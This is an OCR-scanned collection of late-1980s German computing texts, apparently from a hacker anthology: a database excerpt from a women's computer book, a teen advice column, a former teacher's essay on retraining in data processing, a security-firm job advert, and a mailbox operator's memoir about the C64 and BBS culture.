diese Prinzipien in der Praxis bedeuten. Die meisten elektronisch gespei¬
cherten Anschriftenlisten werden einfach dadurch geschaffen, daß Per-
sonenverzeichnisse gekauft und fe einer Datenbank zusammengefeßt
werden. Die Betroffenen wissen nichts davon und werden auch nicht
um ihre Zustimmung gebeten. Unser Anschriftenverzeichnis dagegen
beruht auf Freiwilligkeit. Um aufgenommen zu werden, müssen Sfe ein
spezielles Erfassungsformular unterzeichnen, sei es als Einzelperson
oder als Frauenorganisation.
Das Erfassungsformular ist in zahlreiche Felder aufgegliedert. Hier
können die Teilnehmerinnen Angaben über Alter, Beruf, ethnische Zu¬
gehörigkeit, Familienstand machen oder den Zweck ihrer Organisation
beschreiben. Jede Frau gibt an, zu welchen Themenbereichen sie Infor-
mationen erhalten möchte. Dazu steht ein breites Feld an Frauenthemen
zur Auswahl. Jeder Themenbereich im Datenbanksystem ist einem sepa¬
raten Feld zugeordnet. Das eingeschickte Formular wird als Datensatz
in die Datei eingegeben.
Mit Hilfe der Selektionsmöglichkeiten des Datenbankprogramms las¬
sen sich für eine Vielzahl von Frauenorganisationen und Themen kun¬
denspezifische Listen anlegen. Zu diesem Zweck genügt es anzugeben,
welche Felder durchsucht werden sollen. Zum Beispiel körmen wir den
Computer anweisen, die 60.000 Datensätze der Hauptdatei durchzuse¬
hen und alle Personen anzugeben, die Interesse an Frauenliteratur haben.
Feministische Verlage können dann diesem Personenkreis ihre Buchan¬
kündigungen zuschicken. Es lassen sich auch mehrere Felder kombinie¬
ren. Wir köimen zum Beispiel diejenigen herausfiltem, die sich für Frau¬
enliteratur interessieren und in Chicago wohnen. Dieser Personenkreis
kann dann über Autorenlesungen in Chicagos Frauenbuchhandlungen
informiert werden. Wenn ein Buch den Themenkreis ältere Frauen be¬
handelt, lassen sich alle Personen auffinden, die sich für Frauenliteratur
interessieren, in Chicago leben und über 50 Jahre alt sind. Handelt cs
sich um ein Lehrbuch, so könnten alle Pädagoginnen unter diesen Frauen
angesprochen werden. Eine Datenbank kann somit die verschiedensten
Anforderungen erfüllen, je nachdem, wie die Suchbedingungen definiert
wurden.
Die Aufnahme in die National Women’s Mailing List ist nicht nur
freiwillig, sondern es werden auch die Wünsche der Teilnehmerinnen
respektiert. Es können Frauen mit den verschiedensten Interessen in die
Datenbank aufgenommen werden. Sie können sicher sein, daß sie nur zu
den von ihnen gewählten Themen Informationen erhalten. Eine Frau, die
angegeben hat, daß sie sich nur für Fragen der Frauengesundheit interes¬
siert, wird nie in einer Adressenliste auftauchen, in der Personen mit
Interesse am Frauensport zusammengefaflt sind. In ihrem Datensatz
ist das Feld für Sport freigelassen. Daher ist ausgeschlossen, daß ihr
Name auf einer Liste erscheint, die für die Konferenz über Frauen-
Leichtathletik bestellt wurde. Da der Computer den Anweisungen blind
gehorcht, überspringt er ihren Namen, ohne ihn in die Unterdatei auf¬
zunehmen. Unser Computer kommt voll und ganz den Wünschen der
einzelnen Teilnehmerinnen entgegen, und diese müssen sich nicht den
Vorgaben des Systems unterordnen.
Das Erfassungsformular
Die Verwendbarkeit einer Datenbank hängt einzig davon ab, wieviele
Felder für Informationen vorgesehen sind. Unser Erfassungsformular
muß daher so umfassend wie möglich sein. Alle wichtigen Interessenge¬
biete, über die Frauen möglicherweise informiert werden möchten, müs¬
sen angegeben sein. Zunächst erstellten wir selbst ein Verzeichnis. Doch
bald erkannten wir, daß es nicht vollständig war. Um die Lücken zu fül¬
len, fügten wir unter der Überschrift »Weiteres« am Ende jeder Theraen-
gruppe einige FreizeUen ein. Die Antworten wurden sorgfältig ausge¬
wertet und unser anfänglicher Entwurf auf diese Weise um mehr als 20
Kategorien erweitert. Durch die Möglichkeit der Beteiligten, Einfluß auf
die Gestaltung des Systems zu nehmen, wurden die Anwendungsmög¬
lichkeiten der Datenbank zum Vorteil aller erweitert.
Mit Hilfe des Computers läßt sich der Aufbau der Datensätze relativ
leicht um neue Felder erweitern. Die Altmitglieder haben natürlich
Leerstellen anstelle der neuen Felder. Doch vom Zeitpunkt der Neuorga¬
nisation an werden für die Zukunft auch die neuen Daten gesammelt.
Dieses Verfahren ist nicht mit dem Bild des allwissenden System-Gestal¬
ters vereinbar, Doch jedes gute System sollte für zukünftige Veränderun¬
gen offen sein.
Es ist uns wohl bewußt, daß wir nicht jedes für Frauen interessante
Gebiet erfassen köimen. Wir erfüllen die Rolle von Informations-Mana¬
gerinnen oder Datenbank-Biblioüiekarinnen. Unsere Aufgabe besteht
darin, den Datensatzaufbau im Computer den Bedürfnissen anzupassen.
Dieses Verfehren hat den zusätzlichen Vorteil, mit einem »lebenden«
System zu arbeiten und auf sich ändernde soziale Bedingungen eingehen
zu können. Zum Beispiel war Stop der Atomenergie beim Aufbau des
Systems noch kein Thema. Nachdem wiederholt Interesse daran bekun¬
det wurde, haben wir es unter die vorhandenen Interessengebiete aufge¬
nommen.
STECKBRIEFE zum Sammeln!
Ausschneiden, in der Mitte falten und hinten zusammenkleben
BRAVO-Steckbrief
Unser Bruder hockt
ständig vorm Computer
Wir haben ein großes, Problem.
Unser kleiner Bmder (14 A) Ist ein
fanatischer Computer-Freak. Er
sitzt den ganzen Tag nur vor seinem
Gerät.
Wenn wir ihn ansprechen, antwor¬
tet er nur mit Faohbegritfen aus der
Computer-Fachsprache. Wie brin¬
gen wir ihn dazu, weniger vor die¬
sem Ding zu hocken?
Er Ist nämlich in der Schule auch
schon drastisch abgesackt. Was
können wir unternehmen?
Sigrid und Evelyne, 16, Mosbach
Dr.-Sommer-Team: Eure
Ablehnung macht ihn nur
noch störrischer
Euer Bruder ist begeistert vom
Computer, deshalb werdet Ihr es ver¬
mutlich schwer haben, ihn völlig von
ihm abzubringen. Und daß er seine
Beschäftigung mit ihm einschränken
bzw. sich vernünftig mit Euch unter¬
halten soll, wird er sicher ebenfalls
nur unter Protest akzeptieren.
Meist läßt die Begeisterung für
eine neue Sache mit der Zeit von
alleine etwas nach. Da sich sein neues
Hobby allerdings bereits aut die
Schulleistungen negativ auswirkt,
solltet Ihr mit Euren Eltern gemein¬
sam überlegen, ob der Computerge¬
brauch nicht etwas eingeschränkt
werden soll oder er nur mit dem
Gerät arbeitet, wenn die Hausaufga¬
ben gemacht worden sind.
Sicher werdet Ihr ihn auch leichter
beeinflussen können, wenn Ihr Euch
nicht nur kritisch und ablehnend ge¬
genüber seinem Hobby äußert, son¬
dern Euch im Gegenteil selbst etwas
mehr dafür interessiert.
Dann wird er bestimmt zugängli¬
cher auch für Kritik und fühlt sich
nicht völlig ins Unrecht gesetzt. Mit
seiner .Fachsprache“ will er Euch ja
auch nur verdeutlichen, daß er be¬
geistert ist und seine Freude mit
jemandem teilen möchte. Und wer
weiß, vielleicht entdeckt Ihr dadurch
noch ganz neue Seiten an Eurem
Bruder.
aus: “Go Stop Go", einem Buch aus dem Orlando Verlag
von Deborah Brecher - ein Frauen-Computer Buch.
Empfehlenswert! \ ^
Quelle: päd. extra & demokratische erxiehung
Mit freundlicher Erlaubnis der Autorin
Eva Blumenteld
Ich habe auf
EDV-Fachftau
umgeschult
Eine ehemalige Lehrerin resümiert
Frauen und Technik - zwei Welten prallen
aufeinander oder; Anpassungsfähigkeit -
Die Stärke der weiblichen Sozialisation?
S agen Sie mal, Sie als Lehrerin, noch, dazu mit den
Fächern Sport und Kunst, wie kamen Sie eigentlich aus¬
gerechnet auf die EDV?" - So und ähnlich lauten stets
die Eingangsfragen bei Bewerbungsgesprächen, auf die ich
schon vorbereitet bin, da schon ein Jahr zuvor sämtliche
Freundinnen und Bekannte meinen Entschluß zur EDV-
Umschulung ähnlich erstaunt kommentiert hatten.
Tja, wie kam ich, die - lang, lang ist's her -
in allen Schulfächern außer Mathematik glänzte und mit EDV
nie etwas am Hut hatte, ausgerechnet jetzt dazu, mich als
EDV-Fachfrau ausbilden zu lassen? Um es vorweg zu ne -
men: Frust oder der Gedanke, diese Chance als letzten Stroh-
halm ergreifen zu müssen, waren es nicht.
Nachdem die Nichleinstellung m den
Schuldienst das einzige Sichere war, das mir die Zukunft zu
bieten hatte, war mir klar, daß ich nicht, wie so viele meiner
Kolleginnen an einer - inzwischen so fragwürdig geworde¬
nen -Idealvorstellung von ausgefulltem Lehrerinnendasein
festhalten wollte, Mit einem Jazz-Tanz- und Gymnastikstudio
machte ich mich in Wiesbaden selbständig. Die Arbeit mi
motivierten Erwachsenen (meist Frauen) ^
Spaß, aber nach fünf Jahren versetzte mich der Gedanke, mit
40 oder gar 50 Jahren immer noch graziös vor meiner Spmgei-
wand herumzuturnen, keineswegs in Entzücken. mzu
kamen die mit zunehmendem Alter wachsenden Verlockun¬
gen materiellen Wohlstands. Ich fühlte, daß die Ara des Exi¬
stenzminimums und der abgewetzten Jeans Jetzt langsam
aber sicher dem Ende zugehen mußte.
Den entscheidenden Kkk zur EDV gab mir
eine Freundin, die - ursprünglich Französisch- und Deutsch¬
lehrerin - nach erfolgreicher EDV-Ausbildung noch erfolgrei¬
cher in der EDV-Branche als Dozentin unterrichtet. Femini-
stin - wie ich - überzeugte sie mich, daß wir Frauen uns viel
stärker der, bisher durch und durch männlich dominierten
Technologie bemächtigen müssen, um sie menschlicher zu
gestalten. Das wirkte!
Mit dieser Erkenntnis und mit meinem
Dickkopf, das zu erreichen, was ich mir vorgenommen habe,
fing ich meine Unschulung an. Meine Befürchtungen, von
engstirnigen Computerfreaks umgeben zu sein, deren Kopf
em einziger virtueller Speicher ist, bewahrheitete sich - Göt¬
tin sei Dank - nicht. Ich war erstaunt, in meiner Klasse völlig
„normale" Leute vorzufinden: Lehrer, Pädagogen, Soziolo¬
gen und Psychologen - die Frauen allerdings in absoluter
Minderheit.
Die spannendste Entdeckung für mich war,
zu beobachten, wie mit wachsender Kompetenz und Sicher¬
heit der Frauen das Rollenverständnis und die Sicherheit der
Männer ins Wanken geriet. Und energisch mußten wir Frauen
manches Mal sein, sei es um ungebetene „gut gemeinte"
Ratschläge männlicher Kollegen abzuwehren oder um uns
gegen die männlich-gedankenlose Titulierung als EDV-Fach-
mann zu wehren. Überhaupt ist die ganze Fachterminologie
durch und durch männlich. Bei der Berechnung in „Mannjah-
ren", „Mannmonaten" und „Mannlagen" fragte ich mich
ernsthaft, was denn die Frauen in der EDV eigentlich machen.
Auch im Umgang mit dem Unlerrichtsstoff
und der Technik waren die Frauen unbefangener, ja respekt¬
loser als die meisten Männer, die in der Regel ungern Zuga¬
ben, wenn sie etwas nicht verstanden. - Oder liegt das daran
daß wir Frauen zu ignorant sind, einzusehen, daß die Technik
eine heilige Kuh ist? Für mich ist und bleibt ein Computer
eine zwar hochkomplizierte, aber dumme Maschine, die nur
so intelligent ist, wie das vom Menschenhirn erdachte Pro¬
gramm, mit dem sie arbeitet. Selbst als EDV-Fachfrau (so darf
ich mich jetzt nennen!) vermag ich in dem Mythos Computer
nichts hintergründig Geheimnisvolles zu sehen - wie so viele
meiner Kollegen. Wir Frauen sind deshalb für manche Män¬
ner eine Bedrohung, weil wir in der Lage sind, die Technik zu
entmystifizieren, weil wir, respektlos wie wir sind, in der
Technik nichts anderes sehen als ein arbeitserleichterndes
Hilfsmittel, das uns in die Lage versetzt, uns wesentlicheren
Dingen zuzuwenden. Das Wesentliche ist nicht - wie einige
Männer meinen - die Technik selbst, sondern wie wir tnit
unseren mit Hilfe der Technik ermöglichten Kapazitäten und
Freiräumen umgehen. Doch zurück zur Pädagogik.
A propos Pädagogik, ich fühlte mich wäh¬
rend meiner EDV-Ausbildung sehr oft an Untersuchungen
über geschlechlsspezifische SoziaUsation in der Grundschule
erinnert. Während sich jedoch, wie bereits beschrieben, die
Rolle der „Mädels" inzwischen grundlegend geändert hat
(zumindest der EDV-Mädels, wobei diese nicht repräsentativ
sind), vermochte ich in den Männern oft nur große (wenn
auch inzwischen etwas sensiblere) Buben zu sehen, was
sicherlich mit der häufig etwas unreflektierten männlichen
Technikbegeisterung zu tun hat.
So fand ich eines Tages, als ich meine alle¬
samt männlichen Projekt-Kollegen suchte, diese im Hofe
unseres EDV-Instituts vor, wo sie kopfüber in einem riesigen
Müllcontainer steckten, aus dem sie, ganz glücklich, einen
Haufen kaputter, ausrangierter Tastaturen und Terminals
zerrten, die sie sofort als ihre Beute in Sicherheit brachten, um
sie später zu Hause zu zerlegen. Das nennt man{n) Recycling,
frau kann darauf nur mit einem nachsichtigen Lächeln rea¬
gieren - ebenso wie auf den Dozenten, der in mühevoller
Heimarbeit ein Modell einer Datenfernübertragungseinrich¬
tung gebastelt hatte und uns im Unterricht mit leuchtenden
Augen ans Herz legte, diese einmalige Gelegenheit zu nutzen
und damit zu spielen. Der Fairneß halber muß gesagt werden,
daß es wirklich sehr beeindruckend war, wenn durch Zusam¬
menbringen von Steckverbindungen diverse Glühbirnchen
aufleuchteten.
Was die Lehrkräfte betrifft, so kann man
schon sagen, daß die Frauen mächtig auf dem Vormarsch
sind: Immerhin gibt es inzwischen eine (!) weibliche Lehrkraft
von ca. 20 am Institut, in dem ich die Ausbildung absolvierte.
Auch hier ein gravierender Unterschied:
Während viele männliche Dozenten, die mal eine Frage nicht
beantworten konnten (was immer mal vorkommt), nie Zuga¬
ben, daß sie die Antwort nicht wußten, sondern in abenteuer¬
lichen „intellektuellen" Klimmzügen drumrumhangelten,
gab die Frau unumwunden zu, daß sie es nicht wisse, sie
wolle sich informieren bzw. es im Praktikum mit uns zusam¬
men ausprobieren. Dies brachte ihr von vielen - immerhin
erwachsenen - Schülern prompt den Vorwurf mangelnder
Kompetenz ein. Daß die aus der Erwachsenenbildung kom¬
mende Diplom-Pädagogin didaktisch-methodisch hervorra¬
genden Unterricht hielt, schien den meisten Schülern (die
immerhin zum größten Teil selbst Lehrer sind, aber das sind ja
bekanntlich die schlimmsten) weniger zu bedeuten als nach¬
lesbares Fachwissen.
Nach ISmonatiger EDV-Ausbildung habe
ich, die früher Überlegungen anstellte, ob ein Byte etwas
Eßbares sei, genausoviel begriffen und gelernt wie die mei¬
sten anderen auch; und ich habe die für mich wichtige Erfah¬
rung gemacht: Es gibt kaum etwas, das so schwierig und
kompliziert ist, wie es uns Frauen gerne weisgemacht wird.
Inzwischen habe-ich eine gut bezahlte Stel¬
le in der EDV-Abteilung einer genossenschaftlichen Versi¬
cherung gefunden und freue mich auf alles Neue, das mich
dort erwartet, denn: Wir Frauen sind ja bekanntlich furchtbar
neugierig.
Unsere Autorin:
prfj. extra &. dentokratiiche erziehang April 19C8
Eva Blumenfeld, Jahrgang 1956, Haupt* und Realschullehrerin, selbständige
Jazztanz* und Gymnastiklehrerin, Bildhauerin, EDV-Fachfrau, Wiesbaden
Wir sind ein junges Unterrfehmen mit,Sitz bei und
beschäftigen uns mit Slcherneitssystemen, die insbesondere in der
Datenverarbeitung, aber auch beim Objektschutz Verwendung
finden. Aktueller Schwerpunkt ist die
Computer-Kriminalität
Wir bieten nicht nur unsere Beratung, sondern auch Technologien an.
die zum Beispiel ursprünglich'für den amerikanischen CIA entwickelt
und jetzt freigegeben wurderi. Wir haben das Alleinvertretungsrecht
für den deutschen Sprachraum. Die weltweite Auswertung weiterer
Erfindungen ist uns angeboten.
Die Computer-Kriminalität, das- heißt unberechtigtes Entwenden
gespeicherter Daten, Fahren von Lauschangriffen zur Industriespio¬
nage, Setzen von Viren in fremde EDV-Ar]lägen zur Manipulation oder
Zerstörung von Programmen und Daten, steckt weltweit erst in den
Anfängen. Was 13jährigen .Hackern' gelingt, können Profis mit
entsprechender technischer Ausrüstung noch besser. Dem wirksa¬
men Schutz dagegen gehört der Markt der . Zukunft.. Zu unseren
Kunden werden alle Unternehmen und Institutionen gehören, die mit
der Vertraulichkeit und Geheimhaltung unterliegenden Daten arbeiten
und solche auch speichern, vor allem die Großbetriebe, Banken,
Versicherungen und Behörden.
Unserer Gesellschaft stehen Fachleute und Experten mit vieljähriger
Erfahrung im Bereich der Computer-Kriminalität und eine Verfriebsor-
ganisation zur Verfügung. Die Verstärkung unserer Aktivitäten macht
die Einstellung eines sehr kreativen und dynamischen
Geschäftsführers
notwendig, der in der Lage ist, das Unternehmen weiter aufzubauen.
Erforderlich sind Verständnis für High-Tech-Produkte, die Fähigkeit
zur Entwicklung neuer Marktkonzeptionen, Kenntnisse in Hardware
und Software, absolut seriöses und überzeugendes Auftreten,
sichere Verhandlungsführung sowie die Befähigung zur Motivation
und Führung von Mitarbeitern. Die Dotierung sieht eine Gewinnbeteili¬
gung vor. Eine später gewünschte Kapitalbeteiligung soll nicht
ausgeschlossen sein.
Ausführliche Bewerbungen in üblicher Form mit Lichtbild und
Einkommensvorstellungen erbitten wir — Diskretion ist selbstver¬
ständlich — an die von uns betraute
Zimmerma nn Wirt schaftsberatung GmbH
Schöne Aussicht ■■■■ Samsjag/Sonntag, 23./24. April 1988
HcUij.L f.'il
trG
M'd TI n< ? i- <
I)<..3w-ri Jre-f-rM •’r V-notl; - 1 . 1 'f'te.ÖU
(Jofoofoooo-f-foo-t /o VO^ 04 000 4 odd OÖO/oo«>t O4<'0't9‘f'tio<l1^
oooHdoYooo'looo /oi>o1-I(J401144'10o4/Qoo4446o444o1tKr1'
00 0 111 «10 Holl.»/ODoi-fn-t OII00II O/oelolnoooofloOf/
OOlol oee-ioo lono/00 lo/fio/t d co4 /
1010 « oo/ooHo1oo11'i1i1ol/oo11/1oo4oo6o-1i4l/
O0III00I00 0-14111 /^oo 111 0 0IIIIo*c 4 o/öo 44 Mo-( 6 'IiMi!-
OlOoo-ll'Jöoool'l.j 0/0I0IIII 000 I0III' /o«ooo11‘>‘)oo«o/
Col 0 »00111111 oe/b olPOlo»o»14o o^/ooo'^c^ooo'toiiooo/
Oo, 0'f 00 ^ oo4 /00o-44orf 01006 oo'\ J
«»o-m ool-^l 01 ool /ÖO Olli OA caA oll ö o/ooolll-Jl 011 cj
voocöOOo ^00 00000 00 (^c oooeoceotfoe>c>c>o/ '
QOOÖOOo ^ ^0 00000 OOOo oooooüeo^oocoo/ '
, , 1 . \ if II
ts nandelt sich bei den Nullen um Einsen um die verschlüsselten Fre-
quenzangaben des BKA-Datenfunkes, die im Manuskript zur Hackerbibel
il'. öfsten Zeile des zweiten Absatzes standen. Leider
ist der Schlüssel verlorengeqangen (ab in die Elbe damit; d. Sä.), aber die
Äff durch einfache journalislische Recherche z.B. In einer
oiientlichen Bücherei zu erfahren.
Ein Mailboxbetreiber erzählt
von Reinhard Schrutzki
Ein zarter Lichtstrahl fällt durch das halbblinde
Fenster auf meinen Monitor und versperrt den
Ausblick auf wichtige Daten. “^Aha, es ist wieder
Frühling“, schießt es durchs Hirn. Mühsam re^-
se ich den Blick los von der zweidimensionalen
Schlichtheit und wende ihn QS^enwarts^ Lang
drinot Frühlingswirklichkeit in mein Be
wu ßtsein. Ein letztes Mal gleit J das Au^ber
die Reihe der Bildschirme, die
iunaen Sonne zu verblassen drohen. Schon
halb auf der Treppe und dem
nahen Park durchzuckt mich die Frage. Wie
konnte das alles passieren?“
Meine erste Begegnung mit dem D^puter
hatte ich während der Ausbildung zum Elek
tromeSraniker. Der Personalcomputer war
knapp zwei Jahre alt und hatte seinen Sie-
aeszug gerade erst begonnen, aber schon wa¬
ren zumindest für angehende Techniker, die
Springfluten erkennbar, die er mit sich bnng®n
würde. Da die Ausbildungsvergutung, die ich
damals erhielt, bei weitem nicht ausr^chte.urn
mich in den Besitz der begehrten Gerate zu
setzen, blieb es zunächst bei emer platoni¬
schen Beziehung. Die sah so aus daß ich
ständig zum Zeitschriftenhandler lief, um die
neuesten Fachzeitschriften zu erstehen und
selbige in der Abgeschiedenheit meiner Woh¬
nung zu verschlingen.
Rund ein Jahr später erfolgte dann der erste
große Einbruch auf dem Computermarkt, b r
Clive Sinclair brachte mit dem ZX 80 erstmals
einen Homecomputer auf den Markt, der Tur
kleine Geldbeutel erschwinglich war. Für we¬
niger als tausend Mark konnte man nun ein
zigarrenschachtelgroßes Etwas erstehen das
bei der kleinsten Berührung die Arbeit ^eri ^jy
den vergaß und etwa soviel Speicheipiatz hat¬
te, wie heute benötigt werden um die ersten
zwei Zeilen einer Grafik darzustellen, ln der Tat
war die Leistungsfähigkeit dieser Maschine so
begrenzt daß einem gar nichts anderes übrig
b^eb als sich mit der Alchimistenkuche der
maschinennahen Programmierung S'.cfür
schäftigen, alles andere hatte m der Ausfüh¬
rung viel zu lange gedauert.
Die Werkzeuge, die dem ZX80/81-Program¬
mierer zur Verfügung standen, waren der Rech¬
ner selbst, das bis heute unerreicht gute Hand¬
buch, sowie Rod Zak’s “Programming the Z80“,
alle Lektüre selbstverständlich in englischer
Sprache, denn der deutsche Markt existierte
noch nicht. Die Umsetzung in eine maschi¬
nenlesbare Form geschah im Kopf und auf
Bergen von Papier, denn es gab keine Pro¬
gramme, die diese Arbeit übernehmen konn¬
ten. Der Prozessorbefehl wurde anhand der
Zeichentabelle im Handbuch verschlüsselt und
das zugehörige Zeichen virtuos auf der fünffach
belegten Tastatur in den Rechner gehackt. Es
hat eigentlich nie wieder so unmittelbare Er¬
folgserlebnisse für mich gegeben, wie damals,
wenn sich nach fünf Stunden intensivster Arbeit
herausstellte, daß man tasächlich schnell be¬
wegte Bilder mit dieser oft als Digital-Tür-
stopper verrissenen Maschine erzeugen konn¬
te. Gewiß, die grafische Darstellung war nicht
besser als das legendäre TV-Tennis, das den
Ruhm der Videogames begründete, aber er¬
schwingliche Alternativen gab es halt nicht.
Der nächste Meilenstein für mich war der Com-
modore VC20. Diesen Rechner würdigte ich
dadurch, daß ich ihn nicht kaufte, denn es war
klar, daß da mehr sein mußte als ein farbiger
ZX81, bei dem jede Erweiterung einen Mo¬
natslohn kostete. Und richtig, wenig später er¬
schien der Commodore 64 auf der Bildfläche
ein vielfarbiger Speicherriese mit vollen 64 kB
Speicher, der Möglichkeit, einfach Zusatzge¬
räte wie Floppy-Laufwerke und Drucker an¬
zuschließen und mit damals 1400 DM uner¬
reicht preiswert, wenn man die neuen Mög¬
lichkeiten mit dem Marktstandard verglich. lm
Gegensatz zu anderen Maschinen, die viel¬
leicht mehrfreien Speicher hatten, oder schnel¬
ler waren, hatte der C64 den Vorteil, eine wirk¬
lich offene Maschine zu sein, die sich mit ver¬
gleichsweise geringem Aufwand auch für Dinge
nutzen ließ, an die wohl nicht einmal der
Steller gedacht hat. Dies zeigt sich auch daran
daß dieser Rechner nunmehr im sechsten Jahr
steht und sich millionenfach verbreitet hat. Das
Angebot an Programmen ist schier unüber
sehbar geworden, wenngleich auch der
Schwerpunkt bei den Computerspielen anzn
siedeln ist, weniger bei Gebrauchssoftware
Das Interesse am C64 hielt zwei Jahre und
flachte dann ab. Irgendwie wurde es unbefrie¬
digend, immer wieder irgendwelche Spiele zu
spielen, oder sich mit einem unzulänglichen
Textprogramm herumzuärgern. Die unver¬
meidliche Erkenntnis, daß man seine private
Adressenliste doch besser mittels eines No¬
tizbuches führte, statt mit dem Computer, der
erschreckend unrationell war, wenn man drei
Minuten auf eine Ausgabe warten mußte, die
man auch binnen Sekunden hätte nachschla¬
gen können, tötet jede Euphorie. Die Tage, an
denen die Kiste ausgeschaltet blieb, mehrten
sich und im Frühjahr 1984 war alles zum Still¬
stand gekommen. Die Situation warähnlich wie
bei einer vom Bankrott bedrohten Firma, mit
dem vorhandenen Material war nichts mehr
anzufangen, trotzdem stellte es einen Wert dar,
der zu nutzen war. Logische Konsequenz; ent¬
weder weiter investieren oder alles als Verlust
abschreiben. Da traf es sich gut, daß die Post
nach langem Hin und Her endlich die Erlaubnis
erteilt hatte, Geräte zur nichtöffentlichen be¬
wegten Datenübertragung zu benutzen, die so¬
genannten Akustikkoppler, die zu Preisen um
1000 DM den Einstieg ins Weltdatennetz an-
boten.
Epson CX21 hieß der Schlüssel zum globalen
Dorf, und war ein unscheinbares, kantiges Et¬
was, das sich standhaft weigerte, etwas an¬
deres als den Hörer einergrauen Maus, wie der
Fernsprechtischapparat 612 gerne genannt
wird, zu akzeptieren. Dieses Gerät setzte die
Zeichen, die der Computer von sich gab, in
hörbare Töne um und konnte entsprechende
Töne eines anderen Computers wieder in ein
maschinenkonformes Format umsetzen. Die
Faszination dieser eher profanen Maschine lag
darin, daß es plötzlich egal war, welchen Com¬
puter man benutzte, ob am anderen Ende des
Drahtes ein Homecomputer oder ein Gro߬
rechner war, und wo dieser fremde Rechner
stand. Japan, Amerika, Afrika - das alles
schrumpfte zu mehr oder weniger langen Vor¬
wahlen und im heimischen Wohnzimmer gaben
sich Leute ein Stelldichein im grünen Schimmer
ihrer Monitors, ohne sich jemals von Angesicht
zu Angesicht gesehen zu haben.
Selbst bei der besten interkontinalen Sprech¬
verbindung ist man sich immer der Entfernung
zum Gesprächspartner bewu ßt, so typisch sind
die Laufzeiten der Signale, das Rauschen
transatlantischer Tiefseekabel und das Echo
ferner Satelliten. Beim Gespräch von Tastatur
zu Tastatur entfallen diese Merkmale, es gibt
keine Hinweise mehr auf die Entfernung zwi¬
schen den Stationen und Meldungen wie “Con¬
nection 80, Capetown“ sind bloße Zeichen auf
dem Schirm ohne weitere Bedeutung. Die
Sprache der Computer ist Englisch, und das ist
auch die Sprache, die man überall im globalen
Dorf versteht. Umsogrößer ist dann die Über¬
raschung, wenn man feststellt, daß der Ge¬
sprächspartner, den man im fernen Japan
wähnt, nur ein paar Straßen weiter in Hamburg
wohnt und sich nur zufällig auf den gleichen
Rechner in Ubersee eingewählt hat.
Meist ist es die Post, die vermittels Ihrer Fern¬
melderechnungen den Sinn für Realitäten wie¬
der geraderückt. Nach etlichen tausend Ge¬
sprächseinheiten tritt die Ernüchterung ein und
man beginnt damit, sich Gedanken über andere
Nutzungsmöglichkeiten zu machen. Bleibe im
Lande und nähre dich redlich, so lautet die
Devise und internationale Kontakte schrump¬
fen auf das unvermeidliche Mindestmaß. Nur
gab es damals in Deutschland bloß eine Hand¬
voll von Systemen, die man per Telefon errei¬
chen konnte, und in Hamburg gar nur zwei,
nämlich den Rechner der Universität, der hoff¬
nungslos überlastet war und mehr als subver¬
sive Müllhalde diente, denn als Kommunika¬
tionssystem, sowie MCS.
MCS heißt Master Control System, und das ist
eine schlichte Übertreibung, denn hinter dem
klangvollen Kürzel verbarg sich ebenfalls ein
C64 und ein einigermaßen chaotisches Ba-
sicprogramm sorgte dafür, daß alles mögliohst
absturzfrei funktionierte. Zu einer Zeit, als Da¬
tenfernübertragung für die meisten Benutzer
noch reiner Selbstzweck war, bot MCS die
Möglichkeit, einem der anderen hundert oder
zweihundert Benutzer eine Nachricht zukom¬
men zu lassen, oder aber seine Ergüße in
einem öffentlichen Brett auf die Allgemeinheit
loszulassen. “Warum schreibt mirden keiner ne
PME?“ und “Kilroy was here“ waren typische
Nachrichten in diesen Tagen, nur hin und wie¬
der von einigermaßen inhaltlichen Beiträgen
unterbrochen. Aber, und nur das ist letztlich
wichtig, MCS war eine der ersten Mailboxen,
die es ermöglichten, sich unabhängig von den
bestehenden Netzen zu machen, eine eigene
DFÜ-(Sub)Kultur zu entwickeln und ich nutzte
diese Möglichkeit zweimal täglich, wann immer
es ging.
Irgendwie kam ich im Herbst 1984 zu einem
zweiten Rechner, ebenfalls einem C64. Dieser
stand zunächst nutzlos herum und hüllte sich in
Staub und Nutzlosigkeit. Das Schicksal wollte
es, daß mein Interesse an MCS auch wieder im
Erlahmen begriffen war, einfach weil es zu¬
wenig Inhaltliches gab, das meine Neugier
weckte oder meine Phantasie anregte, und weil
beinahe täglich neue Dinge ins Programm ka-
men die man sich merken mußte, wollte man
dabeibleiben. Hinzu kam die ständig wach¬
sende Zahl der Benutzer, die es sehr oft un¬
möglich machten, zu vernünftigen Zeiten in die
Mailbox zu kommen, was einem gestandenen
Hacker zwar nichts ausmacht, aber doch lästig
ist wenn man Morgens um Sechs aufstehen
und arbeiten muß. Andere Benutzer hatten das
auch erkannt und der große Mailboxboorn in
Hamburg begann, denn die logische Folge¬
rung wenn man mit etwas unzufrieden ist, ist,
es besser zu machen. Ich besorgte mir also das
Programm der MCS-Mailbox, bastelte eine Ap¬
paratur, die den Telefonapparat bediente und
machte meine eigene Mailbox auf.
l' ÖS' ''
1 i 1 v.
1
1
Early compulcr in Lol Alamol. probably MANIAC or MADCAF by K E. Will«
Die Tatsache, daß ich auf zwei Computer zu¬
greifen konnte, war eine pn.
dingungen für die eigene Mailbox^
satz zu den meisten anderen Betreibern, die
ihren einzigen Computer zweckentfremdeten,
war ich in der Lage, die Dienste Mailbox von
Anfang an rund um die Uhr anzubieten, wenn
man von kleinen Pausen zwecks Eigennutzung
des einzigen Telefonanschlusses mal absiem.
Die ersten drei Monate gab es nur einen inof¬
fiziellen Probebetrieb, die Rufnummer war nur
guten Freunden bekannt, die das Programm
auf Herz und Nieren testen sollten. Große Feh¬
ler waren nicht zu erwarten, so dachte icm, da
das Programm ja schon mehrfach von anderen
Betreibern eingesetzt wurde.
Erkenntnis in mein Hirn ein, daß kein Programm
fehlerfrei sein kann, und die Wahrscheinlich¬
keit, schwerwiegende Fehler vor ihrem Auf¬
treten zu entdecken, umgekehrt proportional zu
dem Schaden ist, den sie anrichten. Wohl in
keinem anderen Bereich werden einem Mur-
phy’s Gesetze so deutlich bewußt, wie beim
Umgang mit dem Computer.
Eine Hürde gab es noch zu überwinden, näm¬
lich einen sinnreichen Namen zu finden, der
sich einprägsam abkürzen iieß, genau wie
MCS, RAM und wie sie alle hei ßen. Da für mich
feststand, daß mein System sich deutlich von
den anderen abgrenzen sollte, war es nur kon¬
sequent, zuerst die Abkürzung
zu ersinnen, und dann einen
Begriff zu schaffen, der sich
passend abkürzen ließ. Da ich
wenige Jahre zuvor bei einer
Rockgruppe namens Goblin
mitgemischt hatte, und diesen
Namen dann als Pseudonym
für meine Datenreisen benutzt
hatte (und das auch heute noch
tue), lag es nahe, auch für die
Mailbox einen Namen aus die¬
